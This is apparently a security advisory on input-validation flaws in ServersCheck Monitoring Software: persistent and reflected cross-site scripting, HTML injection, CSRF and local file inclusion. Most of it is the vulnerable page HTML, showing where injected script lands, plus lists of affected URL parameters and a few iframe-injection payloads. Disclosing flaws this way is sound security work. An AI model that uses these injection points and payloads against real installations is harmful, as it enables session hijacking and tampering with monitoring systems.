372 lines
No EOL
17 KiB
Text
372 lines
No EOL
17 KiB
Text
source: https://www.securityfocus.com/bid/49793/info
|
||
|
||
ServersCheck Monitoring Software is prone to multiple remote input-validation vulnerabilities, including:
|
||
|
||
1. Multiple HTML-injection vulnerabilities
|
||
2. Multiple cross-site scripting vulnerabilities
|
||
3. A cross-site request forgery vulnerability
|
||
4. Multiple local file-include vulnerabilities
|
||
5. A security vulnerability that may allow attackers to send arbitrary SMS messages from the vendor's phone number.
|
||
|
||
An attacker can exploit these issues to execute arbitrary HTML and script code in the context of the browser or the Web server, gain access to sensitive information, send multiple SMS messages, and perform certain administrative tasks. Other attacks are also possible.
|
||
|
||
Code Review: Input Validation Vulnerabilities (Persistent)
|
||
|
||
http://www.example.com/userslist.html?
|
||
|
||
<table border="0" cellpadding="0" cellspacing="0" class="tabdata"
|
||
width='98%'>
|
||
<tr bgcolor="#ff9900">
|
||
<td width=90%><b>Benutzername</b></td>
|
||
<td align=center><b>Zugriffsrechte</b></td>
|
||
<td align=center><b>Löschen</b></td></tr>
|
||
<tr bgcolor='#ffef95'><td style='padding-left:3px;padding-right:3px;'><a
|
||
href='/usersettingsedit.html?username=
|
||
> >"<INSERT SCRIPTCODE HERE!>&'>>"<INSERT OWN PERSISTENT SCRIPTCODE
|
||
HERE!!!></a></td>
|
||
<td align=center><a href="/usersettingsedit.html?username=>"<INSERT OWN
|
||
PERSISTENT SCRIPTCODE HERE!!!>">
|
||
<img src="/output/images/security.gif" border=0></a></td>
|
||
<td align=center><a href='' onclick="return deleteit('0');"><img
|
||
src='/output/images/delete.gif?' border=0></a></td>
|
||
</tr><tr ><td style='padding-left:3px;padding-right:3px;'><a
|
||
href='/usersettingsedit.html
|
||
?username=>"<iframe src=http://test.de>&'>>"<INSERT OWN PERSISTENT
|
||
SCRIPTCODE HERE!!!></a></td>
|
||
<td align=center><a href="/usersettingsedit.html?username=>"<INSERT OWN
|
||
PERSISTENT SCRIPTCODE HERE!!!>">
|
||
<img src="/output/images/security.gif" border=0></a></td>
|
||
<td align=center><a href='' onclick="return deleteit('1');"><img
|
||
src='/output/images/delete.gif?' border=0></a></td>
|
||
</tr></table><br><form action=usersadd.html method=post><td><input
|
||
type=hidden name=add value=yes>
|
||
<input type=submit value="NEUEN BENUTZER HINZUFüGEN" ></form>
|
||
|
||
|
||
http://www.example.com/downtime.html
|
||
|
||
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
|
||
<div style='padding-left:5px;padding-top:5px;'><font color=black
|
||
style="font-size: 16px;"><strong>
|
||
Downtime Bericht >"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!> (1171011122)
|
||
</strong></font>
|
||
<hr align="left" width="97%" size="1" color="#ff9900" noshade
|
||
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
|
||
Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">
|
||
<br><div id="overDiv" style="position:absolute; visibility:hidden;
|
||
z-index:1000;"></div>
|
||
|
||
|
||
http://www.example.com/windowsaccountslist.html
|
||
|
||
<table border="0" cellpadding="0" cellspacing="0" class="tabdata">
|
||
<tr bgcolor="#ff9900">
|
||
<td><b>Benutzername</b></td>
|
||
<td align=center><b>Löschen</b></td>
|
||
</tr>
|
||
<tr bgcolor='#ffef95'><td style='padding-left:3px;padding-right:3px;'><a
|
||
href='/windowsaccountsedit.html?id=
|
||
1269018355&'>>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!></a></td>
|
||
<td align=center><a href='' onclick="return
|
||
deleteit('1269018355');"><img src='/output/images/delete.gif?'
|
||
border=0></a></td>
|
||
</tr></table><br>
|
||
<form action=windowsaccountsedit.html method=post><td><input type=hidden
|
||
name=add value=yes>
|
||
<input type=submit value="NEUEN BENUTZER HINZUFüGEN" ></form>
|
||
|
||
|
||
http://www.example.com/msnsettings.html
|
||
|
||
<div id="overDiv" style="position:absolute; visibility:hidden;
|
||
z-index:1000;"></div>
|
||
<script langauge="JavaScript" src="/output/js/overlib.js?"></script>
|
||
<div style='padding-left:5px;padding-top:5px;'><font color=black
|
||
style="font-size: 16px;"><strong>
|
||
Konfiguriere MSN Warnung
|
||
</strong></font>
|
||
<hr align="left" width="97%" size="1" color="#ff9900" noshade
|
||
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.Gradient
|
||
(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">
|
||
<br>Sie müssen ein MSN Konto festlegen, von dem das MSN basierten
|
||
Warnungen geschickt werden.<br>
|
||
<script language="JavaScript">
|
||
alert('Einstellungen gespeichert');
|
||
</script><div id='stylized' class='settingsform'>
|
||
<form method=post action=msnsettings.html name=msn>
|
||
<input type=hidden name=setting value='MSN'>
|
||
<label>MSN Konto Name</label><input type=text name=account size=30
|
||
value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>"><br>
|
||
<label>MSN Konto Passwort</label><input type=password name=password
|
||
size=10 value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>"<br>
|
||
<br><br><input type=submit class='buttonok' value="EINSTELLUNGEN
|
||
SPEICHERN" ></form></div>
|
||
<br><br></table><br><br> </td></tr></table>
|
||
|
||
|
||
http://www.example.com/enterprisesettings2.html
|
||
|
||
<form method=post action=enterprisesettings2.html>
|
||
<input type=hidden name=setting value='SNMPTRAP'>
|
||
<input type=hidden name=stop value=''>
|
||
<label>IP, an die die Traps gesendet werden</label><input type=text
|
||
name=newsetting0 size=30 value="127.0.0.1" >
|
||
<a onmouseover="return overlib('Geben Sie eine IP Adresse oder einen
|
||
Domänennamen ein, an welche die Traps gesendet
|
||
werden', LEFT);" onmouseout="return nd();"><img
|
||
src="/output/images/info.gif?" border=0 alt='Info'></a><br>
|
||
<label>Port</label><input type=text name=newsetting1 size=30
|
||
value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!><br>
|
||
<label>Der Community String.</label><input type=text name=newsetting2
|
||
size=30 value="" ><br>
|
||
<br><br><input type=hidden value="127.0.0.1<X>>"<INSERT OWN PERSISTENT
|
||
SCRIPTCODE HERE!!!>" name=previoussetting><input type=hidden value=""
|
||
name=check><input type=submit class='buttonok' value="EINSTELLUNGEN
|
||
SPEICHERN" > <input type=button
|
||
value="SENDUNG VON SNMP TRAPS BEENDEN" class='buttonnok'
|
||
Onclick="this.form.stop.value=1; this.form.submit();"></form></div>
|
||
<br><br></table><br><br> </td></tr></table>
|
||
|
||
|
||
http://www.example.com/settings.html?setting=LOGGING&
|
||
|
||
<label>Datenbank Vorlagen</label><select name=odbctemplate
|
||
onchange="javascript:changetemplate();">
|
||
<option value="">Wähle eine Datenbank Vorlage</option>
|
||
<option value="Driver={Oracle ODBC
|
||
Driver};Dbq=myDBName;Uid=myUsername;Pwd=myPassword">Oracle ODBC
|
||
Driver</option>
|
||
<option value="Driver={Microsoft ODBC for
|
||
Oracle};Server=OracleServer.world;Uid=myUsername;Pwd=myPassword">Microsoft
|
||
Oracle ODBC Driver</option>
|
||
<option value="Driver={INFORMIX 3.30 32
|
||
BIT};Host=hostname;Server=myserver;Service=service-name;Protocol=olsoctcp;Database=mydb;UID=username;PWD=myPwd
|
||
|
||
">Informix 3.30 ODBC Driver</option>
|
||
<option value="Driver={Pervasive ODBC Client
|
||
Interface};ServerName=srvname;dbq=">Pervasive ODBC Driver</option>
|
||
<option value="Driver={SQL Server}; Server=(local); Database=myDBName;
|
||
UID=sa; PWD=;">MS SQL ODBC Driver</option>
|
||
<option value="Driver={SQL Server Native Client 10.0};
|
||
Server=enter_IP_here; Database=enter_db_name_here;
|
||
UID=enter_account_name_here;
|
||
PWD=enter_password_here;">MS SQL 2008</option>
|
||
<option value="Driver={Microsoft Access Driver (*.mdb)};
|
||
DBQ=C:myDBName.mdb">MS Access ODBC Driver</option>
|
||
<option value="Driver={Microsoft Excel Driver (*.xls)};DBQ=physical path
|
||
to .xls file; DriverID=278;">MS Excel ODBC Driver</option>
|
||
<option value="Driver={Microsoft Text Driver
|
||
(*.txt;*.csv)};DefaultDir=physical path to .txt file;">Text ODBC
|
||
Driver</option>
|
||
<option value="DRIVER={MySQL ODBC 3.51
|
||
Driver};SERVER=;DATABASE=;USER=;Password=">mySQL ODBC 3.51</option>
|
||
</select><br><label>ODBC Verbindungsstring</label><input type=text
|
||
name=newsetting0 size=50 value=">"<INSERT SCRIPTCODE HERE!>" ><br><br>
|
||
<label>Speichere Werte in der Datenbank</label><input type=checkbox
|
||
name=newsetting1 value="true" > Ja<br><br><br>
|
||
<input type=hidden value=">"<INSERT OWN PERSISTENT SCRIPTCODE
|
||
HERE!!!><X><X><X><X>" name=previoussetting><input
|
||
type=hidden value="ODBC" name=check>
|
||
<input type=submit value="EINSTELLUNGEN SPEICHERN" class='buttonok'>
|
||
<input type=button class='buttonnok' value="DATABANKERFASSUNG BEENDEN"
|
||
Onclick="this.form.stop.value=1; this.form.submit();"></form>
|
||
</div><br><br></table><br><br> </td></tr></table>
|
||
|
||
<label>ODBC Verbindungsstring</label><input type=text name=newsetting0
|
||
size=50 value=">"<iframe src=http://vulnerability-lab.com width=600
|
||
height=600>"
|
||
> ><br><br><label>Speichere Werte in der Datenbank</label><input
|
||
type=checkbox name=newsetting1 value="true" > Ja<br><br><br>
|
||
<input type=hidden value=">"<INSERT OWN PERSISTENT SCRIPTCODE
|
||
HERE!!!><X><X><X><X>" name=previoussetting><input type=hidden
|
||
value="ODBC" name=check>
|
||
<input type=submit value="EINSTELLUNGEN SPEICHERN" class='buttonok'>
|
||
<input type=button class='buttonnok' value="DATABANKERFASSUNG BEENDEN"
|
||
Onclick="this.form.stop.value=1; this.form.submit();"></form>
|
||
</div>
|
||
|
||
|
||
|
||
References:
|
||
http://www.example.com/userslist.html?
|
||
http://www.example.com/teamslist.html?
|
||
http://www.example.com/windowsaccountsedit.html
|
||
http://www.example.com/bulkedit.html?
|
||
http://www.example.com/msnsettings.html
|
||
http://www.example.com/enterprisesettings2.html
|
||
http://www.example.com/settings.html?setting=LOGGING&
|
||
|
||
|
||
|
||
|
||
|
||
1.2
|
||
Code Review: Input Validation Vulnerabilities (Non Persistent)
|
||
|
||
http://www.example.com/checks2def.html
|
||
|
||
<form action=checks3other.html method=post name=checksdef
|
||
onSubmit='return checkrequired(this)'>
|
||
<input type=hidden name=linenumber value=">"<NON-PERSITENT SCRIPTCODE
|
||
HERE!>"><input type=hidden name=type value="">
|
||
<input type=hidden name=addcheck value=""><input type=hidden
|
||
name=editsettings value="1">
|
||
<input type=hidden name=uidrule value="1171011122">
|
||
<input type=hidden name=id value="1171011122">
|
||
<input type=hidden name=required_label value="1171011122">
|
||
<input type=hidden name=devicegraphs value=""><tr>
|
||
<td>Überwachungregel Bezeichnung</td><td><input type=text size=35
|
||
name=namevisible value="WINDOWSHEALTH" style='width:250px;'></td><td>
|
||
</td></tr><tr><td>Geräte-Name</td><td>
|
||
|
||
|
||
http://www.example.com/check2alerts.html
|
||
|
||
<form method=post action=checks2alerts.html name=alerts
|
||
target="main"><td> <td><input type=hidden value=""
|
||
name=linenumber><input type=hidden value="" name=check> <input
|
||
type=button value='FEHLER MELDUNGEN' alt="/checks2alerts.html?
|
||
linenumber=&check=&type=down&KeepThis=true&TB_iframe=true&height=400&width=850"
|
||
title='Bearbeite Alarme für den FEHLER
|
||
– Status' class='thickbox buttonalertsdown'></td></form>
|
||
<form method=post action="" name=alerts target="main" ><td>
|
||
</td><td><input class='buttonnok' type=submit value="
|
||
REGEL LöSCHEN" onclick="return deleteit('>"<NON-PERSITENT SCRIPTCODE
|
||
HERE!','');" onmouseover="return overlib('Durch klicken auf dieses Icon
|
||
können
|
||
Sie die Überwachungsregel löschen. Diese Operation kann nicht rückgängig
|
||
gemacht werden.', LEFT);" onmouseout="return nd();"></td></form>
|
||
</tr></table></div><br><br>
|
||
|
||
|
||
http://www.example.com/viewalerts.html
|
||
|
||
<div style='padding-left:5px;padding-top:5px;'><font color=black
|
||
style="font-size: 16px;"><strong>
|
||
Regel Historie >"<NON-PERSITENT SCRIPTCODE HERE!> (<a
|
||
href="/viewfile.html?file=\checkslogs\1171011122.log">1171011122</a>)
|
||
</strong></font><hr align="left" width="97%" size="1" color="#ff9900"
|
||
noshade style="padding-top:0px; filter:
|
||
progid:DXImageTransform.Microsoft.Gradient(startColorStr='#ffcc00',
|
||
endColorStr='white', gradientType='1')">
|
||
<br>
|
||
|
||
|
||
http://www.example.com/downtime.html
|
||
|
||
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
|
||
<div style='padding-left:5px;padding-top:5px;'><font color=black
|
||
style="font-size: 16px;"><strong>
|
||
Downtime Bericht >"<NON-PERSITENT SCRIPTCODE HERE!> (1171011122)
|
||
</strong></font>
|
||
<hr align="left" width="97%" size="1" color="#ff9900" noshade
|
||
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
|
||
Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">
|
||
<br><div id="overDiv" style="position:absolute; visibility:hidden;
|
||
z-index:1000;"></div>
|
||
|
||
|
||
Non Persistent References:
|
||
http://www.example.com/checks2def.html?id=
|
||
http://www.example.com/checks2def.html?id=1171011122&linenumber=6&check=
|
||
http://www.example.com/checks2def.html?id=1171011122&linenumber=
|
||
http://www.example.com/downtime.html?label=
|
||
http://www.example.com/downtime.html?label=1171011122&keyz=1171011122WINDOWSHEALTH&labelvisible=
|
||
http://www.example.com/timeline/timeline.html?xml=
|
||
http://www.example.com/devicegraphs.html?device=
|
||
http://www.example.com/viewgraphs.html?label=
|
||
http://www.example.com/viewalerts.html?label=1171011122&labelvisible=
|
||
|
||
|
||
|
||
1.3
|
||
Code Review: Cross Site Request Forgery (Force|Non Persistent)
|
||
|
||
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
|
||
<div
|
||
style="padding-left:5px;padding-right:5px;padding-top:10px;padding-bottom:10px;width:90%">
|
||
<img src="/output/images/generalsettings.jpg" border="0" align="left">
|
||
<div style='padding-left:5px;padding-top:5px;'><font color=black
|
||
style="font-size: 16px;"><strong>
|
||
Definere Einstellungen zur Dienstanmeldung.
|
||
</strong></font>
|
||
<hr align="left" width="97%" size="1" color="#ff9900" noshade
|
||
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.Gradient
|
||
(startColorStr='#ffcc00', endColorStr='white', gradientType='1')"> <br>
|
||
ServersCheck läuft als ein Dienst auf diesem Computer. Standardmäßig
|
||
laufen alle Dienste von Windows unter dem lokalen Systemkonto.
|
||
Ein Dienst hat Zugang auf die Maschine, wo er gerade läuft, aber es ist
|
||
ihm ein Remotezugriff andere Computer untersagt. Für Windows
|
||
basierende Checks (Plattenspeicherplatz, Speicher, CPU...), muss der
|
||
ServersCheck Monitoring-Dienst unter einem Windows Admin-Konto
|
||
laufen.<br><br>
|
||
Setze hier die Domäne oder den System-Admin Benutzernamen mit Passwort.
|
||
Zum Auslassen dieser Option bitte leer lassen.<br><br>
|
||
<form action=popup_service2.html method=post name=service setting><table
|
||
cellpadding=5><tr><td>
|
||
Administrator Benutzername</td><td align=right>
|
||
<input type=text size=20 name=user></td></tr><tr><td>
|
||
Administrator Passwort</td><td align=right>
|
||
<input type=password size=20 name=pass></td></tr></table>
|
||
<br><br><input type=submit class='buttonok' value=">> AKTUALISIERUNG" >
|
||
<input type=button class='buttonnok'
|
||
value="SKIP" Onclick="window.location='/popup1.html';">
|
||
</form></div></div><br><br>
|
||
|
||
|
||
|
||
1.4
|
||
Code Review: Local Directory Traversal & Information Disclosure
|
||
|
||
http://www.example.com/viewlogfile2.html?file=scan.txt&
|
||
|
||
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
|
||
<div style='padding-left:5px;padding-top:5px;'><font color=black
|
||
style="font-size: 16px;"><strong>
|
||
ServersCheck Protokolldateibetrachter: scan.txt
|
||
</strong></font>
|
||
<hr align="left" width="97%" size="1" color="#ff9900" noshade
|
||
style="padding-top:0px;
|
||
filter:progid:DXImageTransform.Microsoft.Gradient(startColorStr='#ffcc00',
|
||
endColorStr='white', gradientType='1')"><br>
|
||
<a href="/emptyfile.html?file=logging\scan.txt&">Leere Datei</a>
|
||
<a href="/emptyfile.html?file=logging\scan.txt&delete=true&">Löschen
|
||
Protokolldatei</a>
|
||
<hr noshade width=100%><ul><font color=black>
|
||
# Fri Mar 19 17:37:52 2010 Scanning ><iframe
|
||
src=http://vulnerability-lab.com width=600 height=600>..: Ping Failed
|
||
<br></font></ul></div><br><br> </BODY></HTML>
|
||
|
||
|
||
or ...
|
||
|
||
|
||
<HTML>
|
||
<HEAD>
|
||
<TITLE>ServersCheck 21 Day Evaluation Edition - version 8.0.8</TITLE>
|
||
<META http-equiv=content-type content="text/html">
|
||
<LINK HREF="/output/css/serverscheck.css" rel="stylesheet" type="text/css">
|
||
<LINK HREF="/output/css/thickbox.css" rel="stylesheet" type="text/css"
|
||
media="screen" />
|
||
<script type="text/javascript" src="/output/js/jquery.js"></script>
|
||
<script type="text/javascript" src="/output/js/thickbox.js"></script>
|
||
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
|
||
</HEAD><!-- DE -->
|
||
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
|
||
<div style='padding-left:5px;padding-top:5px;'><font color=black
|
||
style="font-size: 16px;"><strong>
|
||
ServersCheck Protokolldateien</strong></font>
|
||
<hr align="left" width="97%" size="1" color="#ff9900" noshade
|
||
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
|
||
Gradient(startColorStr='#ffcc00', endColorStr='white',
|
||
gradientType='1')"><br>
|
||
Um die Protokolldatei anzusehen, klicken Sie auf den Hyperlink, um sie
|
||
zu öffnen.<br><ul>
|
||
<li><a
|
||
href="/viewlogfile2.html?file=graphs-errors.log&">graphs-errors.log</a></li>
|
||
<li><a
|
||
href="/viewlogfile2.html?file=monitoring_manager_2010-3-19.log&">monitoring_manager_2010-3-19.log</a></li>
|
||
<li><a
|
||
href="/viewlogfile2.html?file=statuschange_2010-3-19.log&">statuschange_2010-3-19.log</a></li>
|
||
<li><a href="/viewlogfile2.html?file=watcher.log&">watcher.log</a></li>
|
||
</ul></div><br><br> </BODY></HTML> |